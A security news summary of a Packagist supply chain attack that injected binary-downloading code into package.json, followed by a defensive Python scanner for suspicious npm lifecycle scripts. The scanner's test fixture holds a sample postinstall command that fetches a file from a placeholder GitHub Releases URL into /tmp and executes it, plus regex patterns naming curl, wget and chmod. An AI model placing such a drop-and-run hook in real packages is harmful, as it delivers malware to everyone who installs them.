Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
Summary
A coordinated supply chain attack has compromised eight packages on Packagist. The attackers inserted malicious code into the package.json files of packages that also ship JavaScript; the injected code is designed to execute a Linux binary downloaded from a GitHub Releases URL.
IFF Assessment
This attack targets the software supply chain, a critical area for defenders: by injecting malicious code into widely used packages, a single compromise can reach many downstream projects, increasing the potential for widespread compromise.
Defender Context
This incident highlights the persistent threat of supply chain attacks, where attackers compromise legitimate software packages to distribute malware. Defenders should scrutinize dependencies, monitor for unusual code in build artifacts, and implement robust security practices for code repositories and package management systems.
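One concrete way to act on the advice above, given the summary's description of malicious code in package.json that fetches and runs a Linux binary from a GitHub Releases URL, is to scan the package.json files in a vendor or node_modules tree for lifecycle scripts that download and execute something. The following Python scanner is an added example written for this page, not code from the report or from any of the affected packages. It assumes the injection took the form of npm lifecycle hooks such as postinstall (a plausible reading of "malicious code in package.json", but not something the report states); the two sample package.json documents, the package names and the GitHub Releases URL inside them are constructed placeholders, not real indicators.

```python
"""Flag package.json lifecycle scripts that fetch and execute remote binaries.

Added example, not code from the original report or the affected packages.
Assumption (not stated by the report): the injected code lived in npm lifecycle
hooks such as "postinstall", which run automatically during `npm install`. The two
package.json documents below are constructed for this example, and the GitHub
Releases URL in them is a placeholder, not a real indicator.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Hooks npm executes on its own during install/publish; no developer action needed.
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall", "prepare", "preprepare",
    "postprepare", "prepublish", "prepublishOnly", "prepack", "postpack",
}

# Heuristics: a download tool, a GitHub Releases asset URL, something that makes a
# file executable or runs a temp/relative path, or an inline subprocess spawn.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b", re.I)
RELEASE_URL_RE = re.compile(
    r"https?://github\.com/[^/\s]+/[^/\s]+/releases/download/[^\s\"']+", re.I)
EXEC_RE = re.compile(r"\bchmod\s+\+x\b|(?:^|[;&|]\s*)(?:\./|/tmp/|/var/tmp/)\S+", re.I)
SPAWN_RE = re.compile(r"\bnode\s+-e\b|child_process|execSync|spawnSync", re.I)


def scan_package_json(text: str, origin: str = "<inline>") -> List[Dict]:
    """Return one finding per suspicious lifecycle script in a package.json body."""
    try:
        doc = json.loads(text)
    except json.JSONDecodeError as exc:
        return [{"origin": origin, "package": "?", "hook": None, "severity": "info",
                 "reasons": [f"unparseable package.json: {exc}"], "command": ""}]
    scripts = doc.get("scripts")
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook, cmd in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue
        reasons = []
        urls = RELEASE_URL_RE.findall(cmd)
        if urls:
            reasons.append(f"fetches a GitHub Releases asset: {urls[0]}")
        elif DOWNLOAD_RE.search(cmd):
            reasons.append("invokes a download tool")
        if EXEC_RE.search(cmd):
            reasons.append("makes a file executable or runs a temp/relative path")
        if SPAWN_RE.search(cmd):
            reasons.append("spawns a subprocess or evaluates inline JavaScript")
        if not reasons:
            continue
        # Download plus execution in one hook is the drop-and-run pattern; rate it high.
        downloads = bool(urls) or bool(DOWNLOAD_RE.search(cmd))
        severity = "high" if downloads and EXEC_RE.search(cmd) else "medium"
        findings.append({"origin": origin, "package": doc.get("name", "?"),
                         "hook": hook, "severity": severity, "reasons": reasons,
                         "command": cmd})
    return findings


def scan_tree(root: Path) -> List[Dict]:
    """Scan every package.json under root (e.g. a vendor/ or node_modules/ tree)."""
    findings: List[Dict] = []
    for path in sorted(root.rglob("package.json")):
        findings.extend(scan_package_json(path.read_text(encoding="utf-8"), str(path)))
    return findings


# Constructed samples. The URL below is a placeholder, not a real IoC.
SUSPICIOUS_PACKAGE_JSON = json.dumps({
    "name": "example-vendor/widget-assets",
    "scripts": {
        "build": "webpack --mode production",
        "postinstall": ("curl -sL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1.0/helper"
                        " -o /tmp/.h && chmod +x /tmp/.h && /tmp/.h"),
    },
})
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-vendor/clean-lib",
    "scripts": {"postinstall": "node scripts/copy-assets.js", "test": "jest"},
})


def demo() -> List[Dict]:
    """Write both samples into a temporary vendor tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for sub, body in (("widget-assets", SUSPICIOUS_PACKAGE_JSON),
                          ("clean-lib", BENIGN_PACKAGE_JSON)):
            pkg_dir = Path(tmp) / "vendor" / "example-vendor" / sub
            pkg_dir.mkdir(parents=True)
            (pkg_dir / "package.json").write_text(body, encoding="utf-8")
        return scan_tree(Path(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"[{f['severity']}] {f['package']} {f['hook']}: {'; '.join(f['reasons'])}")
```

Run it against a checked-out vendor/ or node_modules/ directory with scan_tree, or wire scan_package_json into a CI step that diffs lifecycle scripts between the locked and newly resolved versions of each dependency. The heuristics are deliberately narrow (download tool, Releases asset URL, chmod or temp-path execution, inline node -e) so that ordinary build steps such as running a local script in postinstall do not fire; anything rated high deserves a manual look before the install proceeds.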